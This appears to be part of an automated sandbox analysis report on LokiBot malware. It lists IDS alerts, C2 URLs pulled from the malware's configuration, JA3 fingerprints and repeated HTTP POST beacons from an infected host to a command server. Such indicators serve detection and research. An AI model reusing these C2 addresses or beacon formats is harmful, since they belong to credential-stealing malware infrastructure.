                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50080 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50009 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50061 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50077 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50061 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49969 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49969 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50085 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50085 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50072 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50080 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49724
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50080 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50050 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50074 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50050 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50083 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50083 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50072 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50072 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50071 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50071 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50067 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50083 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50083 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50090 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50090 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50090 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50067 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50074 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:50006
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:50038
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50074 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50074 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49872 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49872 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49872 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50107 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50107 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50107 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50081 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50081 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:50077
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50081 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50089 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50107 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50107 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:50085
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49872 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49872 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50118 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49964
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50118 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50118 -> 172.245.123.11:80
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.245.123.11 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 194.15.112.248 443Jump to behavior
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Malware configuration extractorURLs: http://172.245.123.11/tpm/fre.php
                Source: Joe Sandbox ViewIP Address: 194.15.112.248 194.15.112.248
                Source: Joe Sandbox ViewIP Address: 172.245.123.11 172.245.123.11
                Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: global trafficHTTP traffic detected: GET /rtBS?N HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: oshi.atConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /BLZu HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.atConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 180Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 180Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
